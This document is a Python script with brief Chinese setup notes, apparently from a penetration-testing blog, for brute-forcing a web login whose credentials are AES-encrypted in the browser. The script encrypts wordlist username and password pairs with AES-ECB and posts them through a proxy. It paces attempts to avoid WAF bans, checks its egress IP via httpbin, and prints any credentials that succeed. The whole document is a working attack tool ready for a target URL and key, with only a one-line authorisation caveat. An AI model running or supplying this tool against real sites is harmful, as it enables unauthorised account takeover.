
AES-encrypted request

Brute-forcing a login whose request parameters are AES-encrypted

from cryptography.fernet import Fernet
import requests
import time
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import json

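# The pause between attempts (so a WAF does not rate-limit or ban the egress
# address) is applied with time.sleep() inside aesCrypto(); tune it there.

# Single egress proxy for both URL schemes (e.g. a local interception proxy
# listening on 7890). requests sends HTTPS targets through this proxy too.
PROXY_URL = "http://localhost:7890"
proxies = {
    "http": PROXY_URL,
    "https": PROXY_URL,
}

# Browser-like headers sent with every probe. "Connection: close" asks the
# server to drop the connection after each response.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0",
    "Accept": "application/json, text/plain, */*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Sec-Gpc": "1",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Site": "same-origin",
    "Te": "trailers",
    "Connection": "close",
}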

def setPost(username, password):
    """Build the multipart form fields for one login attempt.

    Each value is a ``(None, value)`` tuple, the shape ``requests`` expects
    for a plain (non-file) field passed through ``files=``.

    Args:
        username: already-encrypted, base64-encoded username payload.
        password: already-encrypted, base64-encoded password payload.

    Returns:
        dict: ``{"user.userid": (None, username), "user.userpassword": (None, password)}``.
    """
    fields = (
        ("user.userid", username),
        ("user.userpassword", password),
    )
    return {name: (None, value) for name, value in fields}

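def input_usernameData(path="./username.txt"):
    """Load the username wordlist, one candidate per line.

    Args:
        path: wordlist file to read. Defaults to ``./username.txt`` relative
            to the current working directory, as before.

    Returns:
        list[str]: candidates in file order with only the line terminator
        removed; other whitespace is kept because it may be part of the
        credential. Blank lines become empty-string candidates.

    Raises:
        OSError: if the file cannot be opened.
    """
    # Was spelled "utf=8"; codec-name normalisation happened to accept it,
    # but the canonical name avoids depending on that.
    with open(path, encoding="utf-8") as f:
        userList = [line.rstrip("\n") for line in f]
    print("[+] 装载用户名字典,数量:{}".format(len(userList)))
    return userList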

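def input_passwordData(path="./password.txt"):
    """Load the password wordlist, one candidate per line.

    Args:
        path: wordlist file to read. Defaults to ``./password.txt`` relative
            to the current working directory, as before.

    Returns:
        list[str]: candidates in file order with only the line terminator
        removed; leading/trailing spaces are kept since they may be part of
        the password. Blank lines become empty-string candidates.

    Raises:
        OSError: if the file cannot be opened.
    """
    # Was spelled "utf=8"; codec-name normalisation happened to accept it,
    # but the canonical name avoids depending on that.
    with open(path, encoding="utf-8") as f:
        passwordList = [line.rstrip("\n") for line in f]
    print("[+] 装载密码字典,数量:{}".format(len(passwordList)))
    return passwordList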

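def getRequest(data, url="填写网站登录后台地址", timeout=30):
    """POST one encrypted credential pair and classify the response.

    Args:
        data: form fields as built by ``setPost``.
        url: login endpoint. The default is the original placeholder and
            must be replaced with the real address before use.
        timeout: per-request timeout in seconds. Without one a stalled or
            tar-pitting server would hang the whole brute-force loop.

    Returns:
        int: 1 when the attempt is judged a failure, 0 when it is judged a
        success. An attempt fails when the status is 4xx/5xx or the body
        contains the keyword "错误". The keyword is target specific: adjust
        it to the site's real failure message, otherwise any page that
        merely lacks it would be reported as a valid login.

    Raises:
        requests.RequestException: on connection or timeout errors, so the
        caller sees an error instead of a misleading "success".
    """
    print("[+] 爆破目标:{}".format(url))
    respond = requests.post(
        url=url, files=data, headers=headers, proxies=proxies, timeout=timeout
    )
    print("[+] http.status: {},http.length: {}".format(respond.status_code, len(respond.content)))
    print(respond.text)
    # A 4xx/5xx (WAF block page, captcha challenge, server error) cannot be a
    # successful login even when its body lacks the keyword, so it must not
    # be reported as success.
    if respond.status_code >= 400:
        return 1
    # Response-body failure marker (target specific, see docstring).
    if "错误" in respond.text:
        return 1
    return 0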

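def _encrypt_b64(cipher, text):
    """Encrypt ``text`` (str) with ``cipher`` and return it base64-encoded.

    Mirrors the client-side scheme the target expects: UTF-8 encode, pad to
    the AES block size (``pad``'s default PKCS#7 style), encrypt, base64.
    """
    padded = pad(text.encode("utf-8"), AES.block_size)
    return base64.b64encode(cipher.encrypt(padded)).decode("utf-8")


def aesCrypto(userList, passwordList, key=None, sleep_seconds=5):
    """Try every username/password pair, encrypting both like the target's client.

    For each username, each password is AES-ECB encrypted under ``key``,
    base64-encoded and posted via ``getRequest``. As soon as one attempt is
    judged successful the loop moves on to the next username.

    Args:
        userList: username candidates (str).
        passwordList: password candidates (str).
        key: raw AES key bytes (16, 24 or 32 bytes). ``None`` falls back to
            the placeholder, which must be replaced before use.
        sleep_seconds: pause after each failed attempt so a WAF does not
            rate-limit or ban the egress address.

    Raises:
        ValueError: if ``key`` does not have a valid AES key length.

    Only run this against systems you are authorised to test.
    """
    if key is None:
        # A non-ASCII bytes literal is a SyntaxError, so encode the str
        # placeholder instead. Replace it with the real key.
        key = "填写aes密钥".encode("utf-8")
    if len(key) not in (16, 24, 32):
        raise ValueError("AES key must be 16, 24 or 32 bytes, got {}".format(len(key)))
    # NOTE: this echoes the key to stdout/logs; remove if the output is shared.
    print("[+] 读取aes密钥:{}".format(key))

    # ECB is deterministic (no IV), so the same cipher object can be reused
    # and the username only needs encrypting once per outer iteration.
    cipher = AES.new(key, AES.MODE_ECB)
    for u in userList:
        base64_encryted_username = _encrypt_b64(cipher, u)
        for p in passwordList:
            base64_encryted_password = _encrypt_b64(cipher, p)
            # One extra request to httpbin.org per attempt (see whatIP).
            IP = whatIP()
            print("--------------------------")
            print("[+] 当前出口IP:{}".format(IP))
            print("[+] payload用户名:{},payload密码:{}".format(base64_encryted_username, base64_encryted_password))
            dealFiles = setPost(base64_encryted_username, base64_encryted_password)
            result = getRequest(dealFiles)
            if result == 1:
                print("[+] 密码错误……\n--------------------------\n")
                time.sleep(sleep_seconds)
            else:
                # u and p are still str here, so the hit is printed as plain
                # text rather than the b'...' repr the old code produced.
                print("\033[0;34m【+】\033[0m" + " 爆破成功!\n用户名:{},密码:{}".format(u, p))
                break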

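def whatIP(timeout=15):
    """Return the public egress IP as reported by https://httpbin.org/ip.

    The lookup now goes through the same ``proxies`` as the login attempts,
    so the printed address is the one the target actually sees. Previously
    the request was sent directly and reported the operator's own IP even
    when a proxy was configured. Note that this call is made once per
    attempt from aesCrypto, which tells a third party (httpbin.org) that a
    run is in progress.

    Args:
        timeout: request timeout in seconds.

    Returns:
        str: the ``origin`` field of httpbin's JSON response.

    Raises:
        requests.RequestException: on connection or timeout errors.
        ValueError: if the body is not valid JSON.
        KeyError: if the JSON has no ``origin`` field.
    """
    respond = requests.get(
        url="https://httpbin.org/ip", headers=headers, proxies=proxies, timeout=timeout
    )
    return respond.json()["origin"]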

def main():
    """Script entry point: load both wordlists, then run the brute force."""
    print("AES password blasting启动中……")
    usernames = input_usernameData()
    passwords = input_passwordData()
    aesCrypto(usernames, passwords)
    print("[+] running over~")


if __name__ == "__main__":
    main()

需要填写:

  • 网站地址
  • aes密钥
  • 休眠时间(如果目标没有waf,可以不设置)
  • 响应包中的失败标志词(getRequest 中默认为"错误",需按目标站点的实际返回修改,否则不含该词的页面会被误判为爆破成功)
    根据目标站点请求包的数据结构,自行更改files表单参数部分或是修改成data类型参数